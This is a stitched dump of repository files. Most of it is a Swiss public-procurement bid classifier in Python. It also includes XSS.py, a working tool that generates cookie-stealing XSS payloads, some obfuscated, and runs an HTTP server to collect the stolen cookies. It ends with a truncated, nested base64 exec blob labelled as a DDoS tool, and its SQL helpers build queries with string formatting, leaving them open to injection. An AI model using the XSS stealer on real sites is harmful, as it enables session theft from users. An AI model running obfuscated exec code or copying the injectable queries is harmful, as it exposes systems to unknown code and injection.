cpv_dokument.cpv_nummer AND cpv_dokument.meldungsnummer = zuschlag.meldungsnummer AND zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer AND beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id AND anbieter.institution = "{}" GROUP BY cpv_nummer ORDER BY COUNT(cpv_dokument.cpv_nummer) DESC; """.format(bidder) return pd.read_sql(query, connection); # @param bidder: anbieter.institution formatted as string of which you want to see the CPV code diversity # @return a Pandas Dataframe that contains a the diversity of CPV codes per bidder def getCpvDiversity(bidder): query = """SELECT anbieter.institution, COUNT(beruecksichtigteanbieter_zuschlag.anbieter_id) AS "Anzahl Zuschläge", COUNT(DISTINCT cpv_dokument.cpv_nummer) AS "Anzahl einzigartige CPV-Codes", SUM(IF(beruecksichtigteanbieter_zuschlag.preis_summieren = 1,beruecksichtigteanbieter_zuschlag.preis,0)) AS "Ungefähres Zuschlagsvolumen", MIN(zuschlag.datum_publikation) AS "Von", MAX(zuschlag.datum_publikation) AS "Bis" FROM cpv, cpv_dokument, zuschlag, beruecksichtigteanbieter_zuschlag, anbieter WHERE cpv.cpv_nummer = cpv_dokument.cpv_nummer AND cpv_dokument.meldungsnummer = zuschlag.meldungsnummer AND zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer AND beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id AND anbieter.institution="{}" GROUP BY anbieter.institution ORDER BY `Anzahl einzigartige CPV-Codes` DESC """.format(bidder) return pd.read_sql(query, connection); # @param select_anbieter: SQL SELECT for the bidder side. Backup: ''' select_an = ( "anbieter.anbieter_id, " "anbieter.anbieter_plz, " "anbieter.institution as anbieter_insitution, " "cpv_dokument.cpv_nummer as anbieter_cpv, " "ausschreibung.meldungsnummer" ) ''' # @param select_aus: SQL SELECT for the open tenders. Backup: ''' select_aus = ( "anbieter.anbieter_id, " "auftraggeber.institution as beschaffungsstelle_institution, " "auftraggeber.beschaffungsstelle_plz, " "ausschreibung.gatt_wto, " "cpv_dokument.cpv_nummer as ausschreibung_cpv, " "ausschreibung.meldungsnummer" ) ''' # @param bidder: the bidder formatted as string you or do not want the corresponding responses from # @param response: True if you want all the tenders of the bidder or False if you do not want any (the negative response) # @return a dataframe containing negative or positive bidding cases of a chosen bidder def getResponses(select_anbieter, select_ausschreibung, bidder, response): resp = '='; if (not response): resp = '!=' query = """SELECT * FROM (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = zuschlag.meldungsnummer) WHERE anbieter.institution {} "{}" ) anbieter JOIN (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = ausschreibung.meldungsnummer) WHERE anbieter.institution {} "{}" ) ausschreibung ON ausschreibung.meldungsnummer2 = anbieter.meldungsnummer ORDER BY ausschreibung.meldungsnummer2; """.format(select_anbieter, resp, bidder, select_ausschreibung, resp, bidder) return pd.read_sql(query, connection); # @return def getCpvRegister(): return pd.read_sql("SELECT * FROM cpv", connection); # @param select_an # @param select_aus # @param anbieter # @return def createAnbieterDf(select_an, select_aus, anbieter): # Create a new DFs one containing all positiv, one all the negative responses data_pos = getResponses(select_an, select_aus, anbieter, True) data_neg = getResponses(select_an, select_aus, anbieter, False) return data_pos.copy(), data_neg.copy() # ======================== # MODEL CREATION FUNCTIONS # ======================== # @param df_pos_full # @param df_neg_full # @param negSampleSize # @return def decisionTreeRun(df_pos_full, df_neg_full , neg_sample_size): df_pos = df_pos_full # Create a random DF subset ussed to train the model on df_neg = df_neg_full.sample(neg_sample_size) # Assign pos/neg lables to both DFs df_pos['Y']=1 df_neg['Y']=0 # Merge the DFs into one df_appended = df_pos.append(df_neg, ignore_index=True) # Clean PLZ property df_appended[['anbieter_plz']] = df_appended[['anbieter_plz']].applymap(tonumeric) df_appended[['beschaffungsstelle_plz']] = df_appended[['beschaffungsstelle_plz']].applymap(tonumeric) # Shuffle the df df_tree = df_appended.sample(frac=1) # Put responses in one arry and all diesired properties in another y = df_tree.iloc[:,[11]] x = df_tree.iloc[:,[1,3,7,9]] # create sets xtrain, xtest, ytrain, ytest = train_test_split(x, y, test_size=0.25) # train the model on training sets clf = tree.DecisionTreeClassifier() clf = clf.fit(xtrain, ytrain) # predict on the test sets res = clf.predict(xtest) ytest["res"]= res ytest['richtig'] = ytest['res']==ytest['Y'] tp = ytest[(ytest['Y']==1) & (ytest['res']==1)] tn = ytest[(ytest['Y']==0) & (ytest['res']==0)] fp = ytest[(ytest['Y']==0) & (ytest['res']==1)] fn = ytest[(ytest['Y']==1) & (ytest['res']==0)] return len(df_pos.index) / neg_sample_size, accuracy_score(ytest.Y, res), confusion_matrix(ytest.Y, res); # @param full_neg: dataframe containing all negative responses for that bidder # @param df_pos_size: amount of data in the positive dataframe # @param amount_neg_def: how many response_negative dataframes the function will produce # @param pos_neg_ratio: what the ratio of positive to negative responses will be # @return a list of negative response dataframes, each considered for one run def createNegativeResponses(full_neg, pos_df_size, amount_neg_df, pos_neg_ratio): all_negatives = []; sample_size = math.ceil(pos_df_size * (pos_neg_ratio + 1)); for count in range(amount_neg_df): all_negatives.append(full_neg.sample(sample_size, random_state=count)); return all_negatives; # ======================= # DATA CLEANING FUNCTIONS # ======================= # @param val: a value to be casted to numeric # @return a value that has been casted to an integer. Returns 0 if cast was not possible def tonumeric(val): try: return int(val) except: return 0 # @param val: a string value to be categorised # @return uniffied gatt_wto resulting in either "Yes", "No" or "?" def unifyYesNo(val): switcher = { 'Ja': 1, 'Sì': 1, 'Oui': 1, 'Nein': 0, 'Nei': 0, 'Non': 0, } return switcher.get(val, 0) # TODO: Kategorien mit Matthias absprechen # @param v: the price of a procurement # @return map prices to 16 categories def createPriceCategory(val): try: val = int(val) except: val = -1 if val == 0: return 0 if 0 < val <= 100000: return 1 if 100000 < val <= 250000: return 2 if 250000 < val <= 500000: return 3 if 500000 < val <= 750000: return 4 if 750000 < val <= 1000000: return 5 if 1000000 < val <= 2500000: return 6 if 2500000 < val <= 5000000: return 7 if 5000000 < val <= 10000000: return 8 if 10000000 < val <= 25000000: return 9 if 25000000 < val <= 50000000: return 10 if 50000000 < val <= 100000000: return 11 if 100000000 < val <= 200000000: return 12 if 200000000 < val <= 500000000: return 13 if val > 500000000: return 14 else: return -1
Python
246
41.13821
124
/helpers.py
0.682511
0.658214
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import json import pandas as pd import warnings class Collection(): algorithms = ['gradient_boost', 'decision_tree', 'random_forest'] def __init__(self): self.list = [] def append(self, item): self.list.append(item) def __iter__(self): return iter(self.list) def get_all_as_df(self, algorithm): try: tmp = [] for iteration in self.list: tmp.append(iteration[algorithm]['metadata']) return pd.DataFrame(tmp, index=[iteration['anbieter'] for iteration in self.list]) except: warnings.warn('Select an algorithm: "random_forest", "gradient_boost" or "decision_tree"') def df_row_per_algorithm(self): tmp = [] for iteration in self.list: for algorithm in self.algorithms: output = iteration[algorithm]['metadata'] evaluation_dataframe = pd.DataFrame.from_dict(iteration[algorithm]['data']) # missing metrics output['acc_std'] = evaluation_dataframe['accuracy'].std() evaluation_dataframe['MCC'] = evaluation_dataframe['MCC']*100 output['mcc_std'] = evaluation_dataframe['MCC'].std() output['fn_std'] = evaluation_dataframe['fn_rate'].std() output['anbieter'] = iteration['anbieter'] output['label'] = iteration['label'] output['algorithm'] = algorithm output['attributes'] = ",".join(iteration['attributes']) tmp.append(output) return pd.DataFrame(tmp) def to_json(self, **kwargs): return json.dumps(self.list, **kwargs) def to_file(self, filename): with open(filename, 'w') as fp: json.dump(self.list, fp, indent=4, sort_keys=True) def import_file(self, filename, force=False): if len(self.list) and not force: warnings.warn("Loaded Collection, pls add force=True") else: with open(filename, 'r') as fp: self.list = json.load(fp)
Python
59
34.423729
102
/collection.py
0.567464
0.56555
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import configparser import sqlalchemy # git update-index --skip-worktree config.ini config = configparser.ConfigParser() config.read("config.ini") connection_string = 'mysql+' + config['database']['connector'] + '://' + config['database']['user'] + ':' + config['database']['password'] + '@' + config['database']['host'] + '/' + config['database']['database'] if __name__ == "__main__": for item, element in config['database'].items(): print('%s: %s' % (item, element)) print(connection_string) else: engine = sqlalchemy.create_engine(connection_string) connection = engine.connect()
Python
20
29.75
212
/db.py
0.645528
0.645528
digital-sustainability/swiss-procurement-classifier
refs/heads/master
from learn import ModelTrainer from collection import Collection import pandas as pd import logging import traceback import os logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) # === THESIS === anbieter_config = { 'Construction': [ 'Alpiq AG', 'KIBAG', 'Egli AG', ], 'IT': [ 'Swisscom', 'ELCA Informatik AG', 'Unisys', ], 'Other': [ 'Kummler + Matter AG', 'Thermo Fisher Scientific (Schweiz) AG', 'AXA Versicherung AG', ], 'Diverse': [ 'Siemens AG', 'ABB', 'Basler & Hofmann West AG', ] } # === TESTING === #anbieter = 'Marti AG' #456 #anbieter = 'Axpo AG' #40 #anbieter = 'Hewlett-Packard' #90 #anbieter = 'BG Ingénieurs Conseils' SA #116 #anbieter = 'Pricewaterhousecoopers' #42 #anbieter = 'Helbling Beratung + Bauplanung AG' #20 #anbieter = 'Ofrex SA' #52 #anbieter = 'PENTAG Informatik AG' #10 #anbieter = 'Wicki Forst AG' #12 #anbieter = 'T-Systems Schweiz' #18 #anbieter = 'Bafilco AG' #20 #anbieter = '4Video-Production GmbH' #3 #anbieter = 'Widmer Ingenieure AG' #6 #anbieter = 'hmb partners AG' #2 #anbieter = 'Planmeca' #4 #anbieter = 'K & M Installationen AG' #4 select = ( "ausschreibung.meldungsnummer, " "anbieter.institution as anbieter_institution, " "auftraggeber.beschaffungsstelle_plz, " "ausschreibung.gatt_wto, " "ausschreibung.sprache, " "ausschreibung.auftragsart, " "ausschreibung.auftragsart_art, " "ausschreibung.lose, " "ausschreibung.teilangebote, " "ausschreibung.varianten, " "ausschreibung.bietergemeinschaft, " "cpv_dokument.cpv_nummer as ausschreibung_cpv" ) attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache'] #attributes = ['auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'ausschreibung_cpv', 'gatt_wto','teilangebote', 'sprache'] #attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache'] # attributes = [ # [ 'ausschreibung_cpv', 'auftragsart_art' ], # [ 'ausschreibung_cpv', 'beschaffungsstelle_plz' ], # [ 'ausschreibung_cpv', 'auftragsart' ], # [ 'ausschreibung_cpv', 'gatt_wto' ], # [ 'ausschreibung_cpv', 'lose' ], # [ 'ausschreibung_cpv', 'teilangebote' ], # [ 'ausschreibung_cpv', 'varianten' ], # [ 'ausschreibung_cpv', 'sprache' ] # ] config = { # ratio that the positive and negative responses have to each other 'positive_to_negative_ratio': 0.5, # Percentage of training set that is used for testing (Recommendation of at least 25%) 'test_size': 0.25, 'runs': 100, #'enabled_algorithms': ['random_forest'], 'enabled_algorithms': ['random_forest', 'decision_tree', 'gradient_boost'], 'random_forest': { # Tune Random Forest Parameter 'n_estimators': 100, 'max_features': 'sqrt', 'max_depth': None, 'min_samples_split': 4 }, 'decision_tree': { 'max_depth': 30, 'max_features': 'sqrt', 'min_samples_split': 4 }, 'gradient_boost': { 'n_estimators': 100, 'learning_rate': 0.1, 'max_depth': 30, 'min_samples_split': 4, 'max_features': 'sqrt' } } class IterationRunner(): def __init__(self, anbieter_config, select, attributes, config): self.anbieter_config = anbieter_config self.select = select self.attributes = attributes self.config = config self.trainer = ModelTrainer(select, '', config, attributes) self.collection = Collection() def run(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr_id in range(len(self.attributes)): att_list = self.attributes[:attr_id+1] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runAttributesEachOne(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr in self.attributes: att_list = [attr] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runAttributesList(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for att_list in self.attributes: self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runSimpleAttributeList(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: self.singleRun(anbieter, self.attributes, label) self.trainer.resetSQLData() def singleRun(self, anbieter, att_list, label): logger.info('label: {}, anbieter: {}, attributes: {}'.format(label, anbieter, att_list)) try: self.trainer.attributes = att_list self.trainer.anbieter = anbieter output = self.trainer.run() output['label'] = label self.collection.append(output) filename = os.getenv('DB_FILE', 'dbs/auto.json') self.collection.to_file(filename) except Exception as e: traceback.print_exc() print(e) print('one it done') runner = IterationRunner(anbieter_config, select, attributes, config) if __name__ == '__main__': # runner.collection.import_file('dbs/auto.json') runner.run() runner.runAttributesEachOne() runner.runAttributesList() # label, anbieters = next(iter(runner.anbieter_config.items())) # print(label)
Python
185
31.459459
152
/runIterations.py
0.604996
0.59567
RomaGeyXD/XSS
refs/heads/main
#!/usr/bin/python3 import argparse import os from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.parse import parse_qs from requests import * ip = get('https://api.ipify.org').text parser = argparse.ArgumentParser(description='creates xss payloads and starts http server to capture responses and collect cookies', epilog='xssthief --error 10.10.10.50' + '\n' + 'xssthief --image 10.10.10.50' + '\n' + 'xssthief --obfuscated 10.10.10.50', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('lhost', help='ip address of listening host') parser.add_argument('-e', '--error', action='store_true', help='create error payload') parser.add_argument('-i', '--image', action='store_true', help='create image payload') parser.add_argument('-o', '--obfuscated', action='store_true', help='create obfuscated payload') args = parser.parse_args() lhost = ip class handler(BaseHTTPRequestHandler): def do_GET(self): qs = {} path = self.path if '?' in path: path, temp = path.split('?', 1) qs = parse_qs(temp) print(qs) def serve(): print('Starting server, press Ctrl+C to exit...\n') address = (lhost, 80) httpd = HTTPServer(address, handler) try: httpd.serve_forever() except KeyboardInterrupt: httpd.server_close() print('\nBye!') def obfuscate(): js = '''document.write('<img src=x onerror=this.src="http://''' + lhost + '''/?cookie="+encodeURI(document.getElementsByName("cookie")[0].value)>');''' ords = ','.join([str(ord(c)) for c in js]) payload = '<img src="/><script>eval(String.fromCharCode(' + ords + '))</script>" />' return payload def err_payload(): xss = '''<img src=x onerror=this.src='http://''' + lhost + '''/?cookie='+document.cookie>''' print('[*] Your payload: ' + xss + '\n') serve() def img_payload(): xss = '''<new Image().src='http://''' + lhost + '''/?cookie='+document.cookie>''' print('[*] Your payload: ' + xss + '\n') serve() def obs_payload(): xss = obfuscate() print('[*] Your payload: ' + xss + '\n') serve() def main(): if args.obfuscated: obs_payload() elif args.error: err_payload() elif args.image: img_payload() else: parser.print_help() main()
Python
69
33.724636
303
/XSS.py
0.581744
0.56998
TAI-REx/DDOSFree
refs/heads/main
#-------------------------------------------------# # Obfuscate By Mr.GamingThanks To Black Coder Crush # github : https://github.com/clayhacker-max # from Linux # localhost : aarch64 # key : Asep-fA6bC2eA6tB8lX8 # date : Fri Jul 16 13:54:16 2021 #-------------------------------------------------# #Compile By DNMODZ #My Team : Black Coder Crush import base64 exec(base64.b64decode("#Compile By DNMODZ
#My Team : Black Coder Crush
import base64
exec(base64.b64decode("I0NvbXBpbGUgQnkgRE5NT0RaCiNNeSBUZWFtIDogQmxhY2sgQ29kZXIgQ3J1c2gKaW1wb3J0IGJhc2U2NApleGVjKGJhc2U2NC5iNjRkZWNvZGUoIkkwTnZiWEJwYkdVZ1Fua2dSRTVOVDBSYUNpTk5lU0JVWldGdElEb2dRbXhoWTJzZ1EyOWtaWElnUTNKMWMyZ0thVzF3YjNKMElHSmhjMlUyTkFwbGVHVmpLR0poYzJVMk5DNWlOalJrWldOdlpHVW9Ja2t3VG5aaVdFSndZa2RWWjFGdWEyZFNSVFZPVkRCU1lVTnBUazVsVTBKVldsZEdkRWxFYjJkUmJYaG9XVEp6WjFFeU9XdGFXRWxuVVROS01XTXlaMHRoVnpGM1lqTktNRWxIU21oak1sVXlUa0Z3YkdWSFZtcExSMHBvWXpKVk1rNUROV2xPYWxKcldsZE9kbHBIVlc5SmEydDNWRzVhYVZkRlNuZFphMlJXV2pGR2RXRXlaRk5TVkZaUFZrUkNVMWxWVG5CVWF6VnNWVEJLVmxkc1pFZGtSV3hGWWpKa1VtSllhRzlYVkVwNldqRkZlVTlYZEdGWFJXeHVWVlJPUzAxWFRYbGFNSFJvVm5wR00xbHFUa3ROUld4SVUyMW9hazFzVlhsVWEwWjNZa2RXU0ZadGNFeFNNSEJ2V1hwS1ZrMXJOVVJPVjJ4UFlXeEtjbGRzWkU5a2JIQklWbGM1U21FeWRETldSelZoWVZaa1JsTnVaRnBoTWxKWFYycEdSMlJYUlhsYVJrNVRWa1phVUZaclVrTlZNV3hXVkc1Q1ZXRjZWbk5XVkVKTFZteGtjMXBGWkd0U1YzaEdXV3BLYTFWdFNsbGhSemxZVmtWd05sZHFSa1psVlRsWVpFZEdXRkpYZUhWV1ZsSlBVekF4V0ZSWWJHRk5TRkp2Vm01d1IwMHhiSEZVYTNST1VsZDRTVlV5TVc5aGF6RnpWbGhzVldFd1dqTlphMlJYVTBaYWRHTkZlRk5OU0VKMlYxaHdTMVpyTVhKT1ZWSlBWako0VUZsWGVFdGpiR1J6V2tVNWEySklRa2xXYkdNMVUyMUtWbGRzYkZWV2JXaHlXVlpWZDJReVNYcGFSbEpYVmpKb1VWWkhlR3RVTURCM1RWVmFhMUl5YUZoYVYzUmFaV3hrV0dORk9WUk5SRVpIV1d0V2IxVkdaRWxSYTFwWFZtMW9SRnBFUm5Oak1rWkdWRzEwYVZaVVZYaFdiRnByWVRKRmVGTlliR3hTUlVwWldXdFdWMDB4VmpaVGEyUllVbFJHV2xkclpITlVhekZJVDFST1ZrMVdXblpXUkVwVFl6SkZlbUpIZEZOTk1taDVWbFphVTFFeFVrZGlSbVJhVFRKb2NsUlhkSE5PYkZWNVkwVk9WR0pGTlVkWk1HTTFWMjFLVlZKc1VtRlNla1pNVmxkemVGSnRVa1pqUlRWVFZrWldOVlpxU2pCaE1WcHpZak5vV0dFeWFIQlZNRnBMWVVaYVYxVnJUbFZTYlZJd1ZHeFdNR0V5U2xaalJsWldWbnBGZDFZeWVHdFNNVTUxVkcxR1UxWXhTalpYYTFaaFpERmFSMUp1VmxKaVYzaFpWV3hXZG1WV1pGVlRWRVpXWWtjNU5Ga3dWbTlWTWtaeVUyMW9WMDFHY0V4YVJFWnpZekZ3UjFkc1ZtaE5SRlYzVmtkNGIxbFhSWGxXYkZwVFZrWmFWVlpzWkZOV1JteFdXa1pPVkZKc2NIaFZWekZ2VmpKV2NsZHVjRmRTVjA0elZGWmtVMlJHVm5GV2JVWk9UVVZ3UjFac1dtOVJNbEp6WWtoR1ZXSkhVbk5XYkdRMFVteFNWbHBIZEdoV01IQldXVlJPZDFaV1NqWlNibHBoVW5wR1ZGWXhXazlXYXpWV1ZXMXNWMUpXYjNwV01XTjNUVlpaZDAxVlpHcFNiRXBUVm10a05GTXhWblZqUm1ST1lraENTbGxZY0VkaE1VbDNWMnhzVldKR1NraFpWRVpLWlVaYWNrOVdTazVoYTFwVlYxWldhMVl4V2tkU2JGWnBVbGhDVkZwWGVGcGxWbVJ5WVVoS1RsWXdWalJaYTFwellVVXhSVlpyVmxwaVJrcElWRmQ0YzJSRk5WZFViV3hPVWpOb1IxWkdWbXRoTWtaWVUyeFdhRTB6UWxaVmJuQkRUa1p3U0UxVmRHdFdiRm93VkRGV1YxWnNaRVpTV0doWFRXNW9jbFZxU2xkV2JVcEdWbXMxVTAxc1NuZFhWM2hUWTIxV2MxVnJhRTlYUlRWd1ZXMHhORmRzVlhoV1ZFWlRVbTVCTWxWWGREUldSbVJJWlVVNVdsWXpVbnBVYkZwVFYwZE9SbU5IZUZkV1JWbzBWbFJHYjJNeFVuUlNia3BwVWtaYVZsWnNVbGRTVm14MFkzcEdUbUpIVWxaVk1qVjNXVlV4VmxOc1ZsWldlbFl6V1ZaVmVHTnJOVmxpUm1ocFVqSm9WRmRyV210VWJWWldUMVpvYWxJeWFFOVphMXB6VFRGV05sRnRPVlZOYkVwNldWUk9jMkV4U1hwaFNFcFdWMGhDV0ZWVVJsZGtSMUkyVm14U2FWSnJjRFZXYlRFMFZqRlNWMUpZWkZSaGJIQmhXVmQwZDFWR2EzbGxTR1JZVm14YVdsWnRlR0ZVYkVwSVpVVmFWMWRJUWtkVWJGcExWakZPV1dGR1VtaE5TRUpYVm14U1MwMUdVWGhTV0d4T1ZsaFNVRlpxUmt0VFZscDBUbGhrVkdKRmNFWlZWekF4VjJzeGNWSnJhR0ZTYkhBelZUQlZOVmRXVm5KTlYyeFRVak5STUZZeFVrcGxSa2w1Vld4a2FsSlhhRkZXTUZwTFZGWldjbFpzV210TlZrWTBWbGQwUzJGc1NsZFRiRTVhWVd0d00xVXlNVmRXYXpGWlVteFNXRkl6YUZCWFZtUXdZekExVjFWc2FHcFNXRUp6Vm14U1IyVkdWbkpYYTJScllrWktlVlpITlZOVlJtUkpVV3MxV21KWVRYZFVWbHB6VG14U2MxUnRiRk5OU0VKV1ZqSndTMk14WkhKTldGWm9VMFUxV1ZadE1XOVRNV3hYVm1wQ1ZtRjZSa2RhUldSelZHc3hSVkpZYUZoWFNFSlFXWHBLVjJSR1ZuSmhSbVJwWWtWd1RsWldVa05rTWxKSFlrWmtZVkl6VW5GVVZtaERWMnhhVjFwSGRGWk5WWEJZVlRKd1MxZHJNSGxsUlZKV1ZucEdWRlV4V2xka1IwWkhZMFUxYVdGNlZqTldXSEJIVW0xUmVGUlliRlZoTW5oVldXMTBTMk5HYkhSbFJXUlZUVlZXTlZSc1ZrOWlSbGwzVjJ4c1ZXSkdTa1JWTW5oR1pESk9SbFJ0UmxOaVYyaFZWMWR3UzFOdFZuTlViR2hoVWxoQ1UxUlZWbFpsVmxWNFZteGtWazFXUmpOWmExWmhWR3hhY2xOc1VsWmlWRUV4V1RCYVMxSXhTblZhUjNST1lYcFZkMWRYZEc5V01rVjRVbGhrVTJKclNsaFVWbVJPVFZaU1YxWnVUbE5OVmxwNFZXMTRkMkZXV25OWGJsWlhVa1Z3ZWxWVVJrdFdNVloxVVd4S2FHVnNXbGRXUmxaaFV6SkdSMVJzYUZwTk1sSlZWRmR6TVZOc1ZYbE9WVTVvVmpCd2VsVnRNREZXUmxsNlZXMW9XbFpXY0hsYVZscGhaRWRLU0dKRk5XaGlXR2N4VmxSR1YxVXlVWGhYYTJScFVtMW9WMVpxU2xOV01WSldWbTVPYVdKRk5WbFhWRTVyVmtVeGNrNVZjRlpOYWxaRVdWWmtTMk14U25KUFZrcE9ZV3RhTmxkclVrTmpNVXBXVFZWb1lWSXpRbkJXYkZwelRteFpkMVZyZEdwTmJFcFpWa2QwYzFZeVJuSlRhekZXVmtWS00xVjZSbUZXYkZKeVZHeGtWMkpZYUdGV1ZFbDNUVlpzVjFwRlpGTmlWRlpXVkZjeE5GRXhiRmRXYWtKV1lYcEdSMXBGWkhkVk1sWjBaSHBHV0dFeFdsQlZWM00xVm0xS1JtRkhiRlJTYkhCNFZsUkNZVmR0VVhoVVdHUlZZVE5TVjFacVFuTk9iRlY1WTBWT1ZHSkZWak5WYlRBeFZrWmFWazVWVGxoaGEwcDZWV3hrU21WV2NFWmpSMmhYVFRGS1VWWldVa3RoYlZGNFZGaHNWRmRJUWxaV01GcGhZMVpTVlZOcVVrOWlTRUpIVjJ0YWEyRXhTbGxWYTFaV1RXcEdNMWxXV2twbFJtUjBUMVp3VG1KWWFFeFhWRUpYVlRGV2RGUnJiRmhpV0VKelZtdGFXazFzWkhOWGJUbFZUVVJHU0Zrd1dtOVViRW8yWWtWMFdtSkdjRE5hUkVaclkxWk9jVlZ0YkZOTlZYQkdWbFprTUZNeVJYaFVhMlJVWWxSc1dWWnJWbmRPYkdSeFVteGFiR0pHV2pCWlZXUjNZVmRLUm1ORVRsaFdla0kwV1ZjeFIxWnRVa2RUYXpWVFYwWktlRlpVUWxka01sRjRZa2hTVDFacmNHaFVWV1EwWld4c05sTnRkRlJpUlZZelZXMHdNVlpHV2xaT1ZVNVlZV3RLZWxWcldrZFhSbkJHWTBaS1RsSldjREZXVkVaWFZERkdjMkl6WkdsU1ZrcFRWbXBLVTFNeFZuUmpSVTVwWWtaS1YxWkhlR0ZaVlRGSVpVaFdWVlpXV1hkWlZFWktaVmRXUlZGc2FHbFNWRUkwVjJ4amVGTXhUa2RYYmxKc1VqTkNVMVJYTVU5T1JsWTJVbXRhYTAxVk1UVldSM1J6VmtkS2NsTnVRbHBpV0doSVdXMTRUMWRIVmtsalJrSlhZVEJ3VjFaR1ZsTmpNVlpYVmxoa1UySlVWbFZXYkZVeFVURmtjVkZ1VGxOU2ExcFpWMnRXZDFWck1VWlhibFpXVFZaYVVGVlhlSFprTWtwR1drVTFVMDFzU2xCWFZtUTBWakpOZUZSc2FGcE5NbEpWVkZkNFMxTldiSEpoUms1YVZteFpNbFp0Y0dGWGJVVjVWV3hvV21FeVVsQlZhMXAzVG14S2NtVkdXbGRTVlhCT1ZqRlNRMkl4VFhsVWEyaFVZbXhhVjFacVNsTlRNV3h5WVVVMVQxWnNXa2hXVm1oclZVWmFjbE5zV2xWV1ZrcDZWbFphWVZKV1JsVldiRkpYVmxSV1JGWXljRU5qTVVwSFVteG9ZVkpZUWxOVVZWWmhaRlpWZUZac2NHdE5Wemt6Vkd4YVYxVnNXWHBoUlhSWVltNUNSRlpGV25kU2JIQkpWRzEwVTJKclNsWldSM2h2WkRKR1YxTllhRmhpYXpWaFZGVlZNV1JXVWxkV2FrSldZWHBHUjFwRlpIZFdSa3BaVVdwT1dGWjZRWGhXVjNoMlpESktTVlJ0Y0d4aVdHaFRWbTEwVTFGck5WZFdhMlJXVjBkU1VWWnRkRXRXYkZKV1ZXNU9WbFpzY0VaVlZsSlhWbXhLYzFKcVRsaGhhMHA2Vld0YVIxZEdjRVpqUms1b1lUQndNVlpyWXpGa01WcDBVMnRhYVZKNlZrOVZiR2hUWTJ4V2NWTnFVazVTYlZKNlZrWlNSMkpIU2xaalJXeFhZbFJGTUZsWGVFWmxWbXQ2WVVaU1RsWldXWHBXV0hCTFZERk9WMVJ1VmxKaVYzaHdXV3RXWVdSV1ZYaGFSRkpzWVhwc1dGVlhlRmRVYkVwSVpVWktWMkV4U2tOVWJGcFhVakZXV1ZwR1FsZGhNSEJYVmtaV1UyTXhWbGRYYTFaU1ZrWmFWMVZ0ZUVkTk1WRjRWMnRPVjAxRVJrbFhhMVV4VmpGS1ZsZFljRlpOYm1oUVZUSjRVMk5zVW5WV2JGcHBZVEJ3ZDFadGNFZFdNREZYWWtSYVZHRnNTbkJWYlRWRFYyeFdWMWw2VmxWaVZscFpXa1ZWTlZWck1YRldiRUphWVRKU1RGcEdXbGRYUm5CSFVteGFUbEpXYkRaV1YzUmhVakpSZDAxSWJGTmhNbWh3VlRCVk1XRkdXbFZSYTNSWFlrZDBOVlJzV210aFZrcFZZa2hXVlZaV1dYZFZNbmhHWkRGS2RFNVdVbGRXVkZaRlYyeGplRk50VmxkVmJsWlVZWHBHY0ZsWWNGZGxiR1JZVFVob1ZrMUVSa2xWTW5CWFlVWkplV1ZJVGxkTlJuQk1XWHBHY21WdFNrVlViVVpPVTBaS1NsZFhkRzloTVZKWFZHdGFWR0ZyY0dGVVYzQlhWVEZyZDFacVFsWmhla1pIV2tWV2QxVnJNVVpYYmxaV1RWWmFVRlZVU2xkak1rNUhZVVU1VjFKVmNFeFdWM1JUVVRKS2MySkVXbFJpUjFKeVZtcEdTMUpXVmxkaFJYUlVZa1Z3UjFadGN6VlZhekYwWlVWT1dHRnJTbnBWYTFwSFYwWndTR05HVG14aVdHTjRWakowVjFReFJuSlBWbHBwVWxkNFUxbHRlSGRqVm14MFpVVmthV0pGTVRaWmExWkxZa1pLVjFOc1RscGhhM0J5VlRKNFJtUXhTblJPVmxKWFZqSm9SVmRzV210U01XUkdUbFpXVW1FelFsTlVWV2hEVm14WmVXVkhjRTVXVkVaSFdXdFdVMVl5U25WUmEzUldUVVphVEZscVJtdFdWazV4VVcxc1UwMVZjRVpXVm1SM1VUSkdXRlpzV2xOaWF6VmhWRlJLTkZKR1VsWmFSV1JVVm1zMU1WWXlNVEJXTURGelUycEtXR0V4V2xCVlZFcFNaVlpPV1dOR1VtaGhNSEJTVjFaYVlWbFZOWE5VYkdocFVteHdjRlJYYzNoT1ZscDBUbFprYUUxVlZqWlpWV2hyVjJzeFJrNUVRbUZTUlhCTFdsZDRU